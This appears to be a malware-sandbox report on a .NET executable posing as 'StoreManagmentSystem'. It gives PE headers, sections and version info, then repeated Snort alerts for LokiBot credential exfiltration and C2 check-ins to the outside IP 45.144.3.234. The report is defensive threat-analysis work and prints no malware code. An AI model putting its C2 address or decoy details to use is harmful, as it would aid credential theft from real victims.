                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xa24780xa2600False0.891697038587data7.85676588796IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc0xa60000x5c40x600False0.425130208333data4.11727870929IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xa80000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_VERSION0xa60900x334data
                                            RT_MANIFEST0xa63d40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Version Infos

                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            LegalCopyrightCopyright 2020
                                            Assembly Version1.0.0.0
                                            InternalNamed.exe
                                            FileVersion1.0.0.0
                                            CompanyName
                                            LegalTrademarks
                                            Comments
                                            ProductNameStoreManagmentSystem
                                            ProductVersion1.0.0.0
                                            FileDescriptionStoreManagmentSystem
                                            OriginalFilenamed.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            12/02/20-11:52:41.429220TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971280192.168.2.645.144.3.234
                                            12/02/20-11:52:41.429220TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971280192.168.2.645.144.3.234
                                            12/02/20-11:52:41.429220TCP2025381ET TROJAN LokiBot Checkin4971280192.168.2.645.144.3.234
                                            12/02/20-11:52:41.429220TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971280192.168.2.645.144.3.234
                                            12/02/20-11:52:41.861237TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971380192.168.2.645.144.3.234
                                            12/02/20-11:52:41.861237TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971380192.168.2.645.144.3.234
                                            12/02/20-11:52:41.861237TCP2025381ET TROJAN LokiBot Checkin4971380192.168.2.645.144.3.234
                                            12/02/20-11:52:41.861237TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971380192.168.2.645.144.3.234
                                            12/02/20-11:52:42.190739TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971480192.168.2.645.144.3.234
                                            12/02/20-11:52:42.190739TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971480192.168.2.645.144.3.234
                                            12/02/20-11:52:42.190739TCP2025381ET TROJAN LokiBot Checkin4971480192.168.2.645.144.3.234
                                            12/02/20-11:52:42.190739TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971480192.168.2.645.144.3.234
                                            12/02/20-11:52:42.317408TCP2025483ET TROJAN LokiBot Fake 404 Response804971445.144.3.234192.168.2.6
                                            12/02/20-11:52:42.691672TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971580192.168.2.645.144.3.234
                                            12/02/20-11:52:42.691672TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971580192.168.2.645.144.3.234
                                            12/02/20-11:52:42.691672TCP2025381ET TROJAN LokiBot Checkin4971580192.168.2.645.144.3.234
                                            12/02/20-11:52:42.691672TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971580192.168.2.645.144.3.234
                                            12/02/20-11:52:42.818739TCP2025483ET TROJAN LokiBot Fake 404 Response804971545.144.3.234192.168.2.6
                                            12/02/20-11:52:43.223645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971680192.168.2.645.144.3.234
                                            12/02/20-11:52:43.223645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971680192.168.2.645.144.3.234
                                            12/02/20-11:52:43.223645TCP2025381ET TROJAN LokiBot Checkin4971680192.168.2.645.144.3.234
                                            12/02/20-11:52:43.223645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971680192.168.2.645.144.3.234
                                            12/02/20-11:52:43.354863TCP2025483ET TROJAN LokiBot Fake 404 Response804971645.144.3.234192.168.2.6
                                            12/02/20-11:52:43.786463TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971780192.168.2.645.144.3.234
                                            12/02/20-11:52:43.786463TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.645.144.3.234
                                            12/02/20-11:52:43.786463TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.645.144.3.234
                                            12/02/20-11:52:43.786463TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971780192.168.2.645.144.3.234
                                            12/02/20-11:52:43.916834TCP2025483ET TROJAN LokiBot Fake 404 Response804971745.144.3.234192.168.2.6
                                            12/02/20-11:52:44.367508TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971880192.168.2.645.144.3.234
                                            12/02/20-11:52:44.367508TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971880192.168.2.645.144.3.234
                                            12/02/20-11:52:44.367508TCP2025381ET TROJAN LokiBot Checkin4971880192.168.2.645.144.3.234
                                            12/02/20-11:52:44.367508TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971880192.168.2.645.144.3.234
                                            12/02/20-11:52:44.495389TCP2025483ET TROJAN LokiBot Fake 404 Response804971845.144.3.234192.168.2.6
                                            12/02/20-11:52:44.817786TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.645.144.3.234
                                            12/02/20-11:52:44.817786TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.645.144.3.234
                                            12/02/20-11:52:44.817786TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.645.144.3.234
                                            12/02/20-11:52:44.817786TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.645.144.3.234
                                            12/02/20-11:52:44.947918TCP2025483ET TROJAN LokiBot Fake 404 Response804972045.144.3.234192.168.2.6
                                            12/02/20-11:52:45.670062TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.645.144.3.234
                                            12/02/20-11:52:45.670062TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.645.144.3.234
                                            12/02/20-11:52:45.670062TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.645.144.3.234
                                            12/02/20-11:52:45.670062TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.645.144.3.234
                                            12/02/20-11:52:45.795234TCP2025483ET TROJAN LokiBot Fake 404 Response804972145.144.3.234192.168.2.6
                                            12/02/20-11:52:46.501885TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.645.144.3.234
                                            12/02/20-11:52:46.501885TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.645.144.3.234
                                            12/02/20-11:52:46.501885TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.645.144.3.234
                                            12/02/20-11:52:46.501885TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.645.144.3.234
                                            12/02/20-11:52:46.626796TCP2025483ET TROJAN LokiBot Fake 404 Response804972245.144.3.234192.168.2.6
                                            12/02/20-11:52:47.200282TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.645.144.3.234
                                            12/02/20-11:52:47.200282TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.645.144.3.234
                                            12/02/20-11:52:47.200282TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.645.144.3.234
                                            12/02/20-11:52:47.200282TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.645.144.3.234
                                            12/02/20-11:52:47.331655TCP2025483ET TROJAN LokiBot Fake 404 Response804972345.144.3.234192.168.2.6
                                            12/02/20-11:52:47.619407TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.645.144.3.234
                                            12/02/20-11:52:47.619407TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.645.144.3.234
                                            12/02/20-11:52:47.619407TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.645.144.3.234
                                            12/02/20-11:52:47.619407TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.645.144.3.234
                                            12/02/20-11:52:47.748180TCP2025483ET TROJAN LokiBot Fake 404 Response804972445.144.3.234192.168.2.6
                                            12/02/20-11:52:48.049426TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.645.144.3.234
                                            12/02/20-11:52:48.049426TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.645.144.3.234
                                            12/02/20-11:52:48.049426TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.645.144.3.234
                                            12/02/20-11:52:48.049426TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.645.144.3.234
                                            12/02/20-11:52:48.184302TCP2025483ET TROJAN LokiBot Fake 404 Response804972545.144.3.234192.168.2.6
                                            12/02/20-11:52:48.489829TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.645.144.3.234
                                            12/02/20-11:52:48.489829TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.645.144.3.234
                                            12/02/20-11:52:48.489829TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.645.144.3.234
                                            12/02/20-11:52:48.489829TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.645.144.3.234
                                            12/02/20-11:52:48.616771TCP2025483ET TROJAN LokiBot Fake 404 Response804972645.144.3.234192.168.2.6
                                            12/02/20-11:52:48.881874TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.645.144.3.234
                                            12/02/20-11:52:48.881874TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.645.144.3.234
                                            12/02/20-11:52:48.881874TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.645.144.3.234
                                            12/02/20-11:52:48.881874TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.645.144.3.234
                                            12/02/20-11:52:49.007215TCP2025483ET TROJAN LokiBot Fake 404 Response804972745.144.3.234192.168.2.6
                                            12/02/20-11:52:49.288846TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.645.144.3.234
                                            12/02/20-11:52:49.288846TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.645.144.3.234
                                            12/02/20-11:52:49.288846TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.645.144.3.234
                                            12/02/20-11:52:49.288846TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.645.144.3.234
                                            12/02/20-11:52:49.418237TCP2025483ET TROJAN LokiBot Fake 404 Response804972845.144.3.234192.168.2.6
                                            12/02/20-11:52:49.753380TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.645.144.3.234
                                            12/02/20-11:52:49.753380TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.645.144.3.234
                                            12/02/20-11:52:49.753380TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.645.144.3.234
                                            12/02/20-11:52:49.753380TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.645.144.3.234
                                            12/02/20-11:52:49.881766TCP2025483ET TROJAN LokiBot Fake 404 Response804972945.144.3.234192.168.2.6
                                            12/02/20-11:52:50.187410TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.645.144.3.234
                                            12/02/20-11:52:50.187410TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.645.144.3.234
                                            12/02/20-11:52:50.187410TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.645.144.3.234
                                            12/02/20-11:52:50.187410TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.645.144.3.234
                                            12/02/20-11:52:50.313590TCP2025483ET TROJAN LokiBot Fake 404 Response804973045.144.3.234192.168.2.6
                                            12/02/20-11:52:50.629810TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.645.144.3.234
                                            12/02/20-11:52:50.629810TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.645.144.3.234
                                            12/02/20-11:52:50.629810TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.645.144.3.234
                                            12/02/20-11:52:50.629810TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.645.144.3.234
                                            12/02/20-11:52:50.756249TCP2025483ET TROJAN LokiBot Fake 404 Response804973145.144.3.234192.168.2.6
                                            12/02/20-11:52:51.071179TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.645.144.3.234
                                            12/02/20-11:52:51.071179TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.645.144.3.234
                                            12/02/20-11:52:51.071179TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.645.144.3.234
                                            12/02/20-11:52:51.071179TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.645.144.3.234
                                            12/02/20-11:52:51.201095TCP2025483ET TROJAN LokiBot Fake 404 Response804973245.144.3.234192.168.2.6
                                            12/02/20-11:52:51.489197TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973380192.168.2.645.144.3.234
                                            12/02/20-11:52:51.489197TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.645.144.3.234
                                            12/02/20-11:52:51.489197TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.645.144.3.234
                                            12/02/20-11:52:51.489197TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973380192.168.2.645.144.3.234
                                            12/02/20-11:52:51.665470TCP2025483ET TROJAN LokiBot Fake 404 Response804973345.144.3.234192.168.2.6
                                            12/02/20-11:52:51.988951TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.645.144.3.234
                                            12/02/20-11:52:51.988951TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.645.144.3.234
                                            12/02/20-11:52:51.988951TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.645.144.3.234
                                            12/02/20-11:52:51.988951TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.645.144.3.234
                                            12/02/20-11:52:52.132110TCP2025483ET TROJAN LokiBot Fake 404 Response804973445.144.3.234192.168.2.6
                                            12/02/20-11:52:52.491063TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.645.144.3.234
                                            12/02/20-11:52:52.491063TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.645.144.3.234
                                            12/02/20-11:52:52.491063TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.645.144.3.234
                                            12/02/20-11:52:52.491063TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.645.144.3.234
                                            12/02/20-11:52:52.618567TCP2025483ET TROJAN LokiBot Fake 404 Response804973545.144.3.234192.168.2.6
                                            12/02/20-11:52:52.880420TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.645.144.3.234
                                            12/02/20-11:52:52.880420TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.645.144.3.234
                                            12/02/20-11:52:52.880420TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.645.144.3.234
                                            12/02/20-11:52:52.880420TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.645.144.3.234
                                            12/02/20-11:52:53.017894TCP2025483ET TROJAN LokiBot Fake 404 Response804973745.144.3.234192.168.2.6
                                            12/02/20-11:52:53.327474TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.645.144.3.234
                                            12/02/20-11:52:53.327474TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.645.144.3.234
                                            12/02/20-11:52:53.327474TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.645.144.3.234
                                            12/02/20-11:52:53.327474TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.645.144.3.234
                                            12/02/20-11:52:53.459325TCP2025483ET TROJAN LokiBot Fake 404 Response804974045.144.3.234192.168.2.6
                                            12/02/20-11:52:53.777770TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.645.144.3.234
                                            12/02/20-11:52:53.777770TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.645.144.3.234
                                            12/02/20-11:52:53.777770TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.645.144.3.234
                                            12/02/20-11:52:53.777770TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.645.144.3.234
                                            12/02/20-11:52:53.903447TCP2025483ET TROJAN LokiBot Fake 404 Response804974145.144.3.234192.168.2.6
                                            12/02/20-11:52:54.204573TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.645.144.3.234
                                            12/02/20-11:52:54.204573TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.645.144.3.234
                                            12/02/20-11:52:54.204573TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.645.144.3.234
                                            12/02/20-11:52:54.204573TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.645.144.3.234
                                            12/02/20-11:52:54.341795TCP2025483ET TROJAN LokiBot Fake 404 Response804974245.144.3.234192.168.2.6
                                            12/02/20-11:52:54.660318TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.645.144.3.234
                                            12/02/20-11:52:54.660318TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.645.144.3.234
                                            12/02/20-11:52:54.660318TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.645.144.3.234
                                            12/02/20-11:52:54.660318TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.645.144.3.234
                                            12/02/20-11:52:54.786220TCP2025483ET TROJAN LokiBot Fake 404 Response804974345.144.3.234192.168.2.6
                                            12/02/20-11:52:55.114402TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.645.144.3.234
                                            12/02/20-11:52:55.114402TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.645.144.3.234
                                            12/02/20-11:52:55.114402TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.645.144.3.234
                                            12/02/20-11:52:55.114402TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.645.144.3.234
                                            12/02/20-11:52:55.244731TCP2025483ET TROJAN LokiBot Fake 404 Response804974445.144.3.234192.168.2.6
                                            12/02/20-11:52:55.544487TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.645.144.3.234
                                            12/02/20-11:52:55.544487TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.645.144.3.234
                                            12/02/20-11:52:55.544487TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.645.144.3.234
                                            12/02/20-11:52:55.544487TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.645.144.3.234
                                            12/02/20-11:52:55.674253TCP2025483ET TROJAN LokiBot Fake 404 Response804974545.144.3.234192.168.2.6
                                            12/02/20-11:52:55.981452TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.645.144.3.234
                                            12/02/20-11:52:55.981452TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.645.144.3.234
                                            12/02/20-11:52:55.981452TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.645.144.3.234
                                            12/02/20-11:52:55.981452TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.645.144.3.234
                                            12/02/20-11:52:56.194096TCP2025483ET TROJAN LokiBot Fake 404 Response804974645.144.3.234192.168.2.6
                                            12/02/20-11:52:56.489115TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.645.144.3.234
                                            12/02/20-11:52:56.489115TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.645.144.3.234
                                            12/02/20-11:52:56.489115TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.645.144.3.234
                                            12/02/20-11:52:56.489115TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.645.144.3.234
                                            12/02/20-11:52:56.615647TCP2025483ET TROJAN LokiBot Fake 404 Response804974745.144.3.234192.168.2.6
                                            12/02/20-11:52:56.856210TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.645.144.3.234
                                            12/02/20-11:52:56.856210TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.645.144.3.234
                                            12/02/20-11:52:56.856210TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.645.144.3.234
                                            12/02/20-11:52:56.856210TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.645.144.3.234
                                            12/02/20-11:52:56.986978TCP2025483ET TROJAN LokiBot Fake 404 Response804974845.144.3.234192.168.2.6
                                            12/02/20-11:52:57.268927TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.645.144.3.234
                                            12/02/20-11:52:57.268927TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.645.144.3.234
                                            12/02/20-11:52:57.268927TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.645.144.3.234
                                            12/02/20-11:52:57.268927TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.645.144.3.234
                                            12/02/20-11:52:57.405086TCP2025483ET TROJAN LokiBot Fake 404 Response804974945.144.3.234192.168.2.6
                                            12/02/20-11:52:57.744999TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.645.144.3.234
                                            12/02/20-11:52:57.744999TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.645.144.3.234
                                            12/02/20-11:52:57.744999TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.645.144.3.234
                                            12/02/20-11:52:57.744999TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.645.144.3.234
                                            12/02/20-11:52:57.883454TCP2025483ET TROJAN LokiBot Fake 404 Response804975045.144.3.234192.168.2.6
                                            12/02/20-11:52:58.120466TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.645.144.3.234
                                            12/02/20-11:52:58.120466TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.645.144.3.234
                                            12/02/20-11:52:58.120466TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.645.144.3.234
                                            12/02/20-11:52:58.120466TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.645.144.3.234
                                            12/02/20-11:52:58.247213TCP2025483ET TROJAN LokiBot Fake 404 Response804975145.144.3.234192.168.2.6
                                            12/02/20-11:52:58.573099TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.645.144.3.234
                                            12/02/20-11:52:58.573099TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.645.144.3.234
                                            12/02/20-11:52:58.573099TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.645.144.3.234
                                            12/02/20-11:52:58.573099TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.645.144.3.234
                                            12/02/20-11:52:58.705685TCP2025483ET TROJAN LokiBot Fake 404 Response804975245.144.3.234192.168.2.6
                                            12/02/20-11:52:58.978022TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.645.144.3.234
                                            12/02/20-11:52:58.978022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.645.144.3.234
                                            12/02/20-11:52:58.978022TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.645.144.3.234
                                            12/02/20-11:52:58.978022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.645.144.3.234
                                            12/02/20-11:52:59.104920TCP2025483ET TROJAN LokiBot Fake 404 Response804975345.144.3.234192.168.2.6
                                            12/02/20-11:52:59.378493TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.645.144.3.234
                                            12/02/20-11:52:59.378493TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.645.144.3.234
                                            12/02/20-11:52:59.378493TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.645.144.3.234
                                            12/02/20-11:52:59.378493TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.645.144.3.234
                                            12/02/20-11:52:59.505512TCP2025483ET TROJAN LokiBot Fake 404 Response804975445.144.3.234192.168.2.6
                                            12/02/20-11:52:59.770770TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.645.144.3.234
                                            12/02/20-11:52:59.770770TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.645.144.3.234
                                            12/02/20-11:52:59.770770TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.645.144.3.234
                                            12/02/20-11:52:59.770770TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.645.144.3.234
                                            12/02/20-11:52:59.952721TCP2025483ET TROJAN LokiBot Fake 404 Response804975545.144.3.234192.168.2.6
                                            12/02/20-11:53:00.250977TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.645.144.3.234
                                            12/02/20-11:53:00.250977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.645.144.3.234
                                            12/02/20-11:53:00.250977TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.645.144.3.234
                                            12/02/20-11:53:00.250977TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.645.144.3.234
                                            12/02/20-11:53:00.382495TCP2025483ET TROJAN LokiBot Fake 404 Response804975645.144.3.234192.168.2.6
                                            12/02/20-11:53:00.644083TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.645.144.3.234
                                            12/02/20-11:53:00.644083TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.645.144.3.234
                                            12/02/20-11:53:00.644083TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.645.144.3.234
                                            12/02/20-11:53:00.644083TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.645.144.3.234
                                            12/02/20-11:53:00.769340TCP2025483ET TROJAN LokiBot Fake 404 Response804975745.144.3.234192.168.2.6
                                            12/02/20-11:53:01.090386TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.645.144.3.234
                                            12/02/20-11:53:01.090386TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.645.144.3.234
                                            12/02/20-11:53:01.090386TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.645.144.3.234
                                            12/02/20-11:53:01.090386TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.645.144.3.234
                                            12/02/20-11:53:01.218769TCP2025483ET TROJAN LokiBot Fake 404 Response804975845.144.3.234192.168.2.6
                                            12/02/20-11:53:01.537713TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.645.144.3.234
                                            12/02/20-11:53:01.537713TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.645.144.3.234
                                            12/02/20-11:53:01.537713TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.645.144.3.234
                                            12/02/20-11:53:01.537713TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.645.144.3.234
                                            12/02/20-11:53:01.667457TCP2025483ET TROJAN LokiBot Fake 404 Response804975945.144.3.234192.168.2.6
                                            12/02/20-11:53:02.003036TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.645.144.3.234
                                            12/02/20-11:53:02.003036TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.645.144.3.234
                                            12/02/20-11:53:02.003036TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.645.144.3.234
                                            12/02/20-11:53:02.003036TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.645.144.3.234
                                            12/02/20-11:53:02.131956TCP2025483ET TROJAN LokiBot Fake 404 Response804976045.144.3.234192.168.2.6
                                            12/02/20-11:53:02.371231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.645.144.3.234
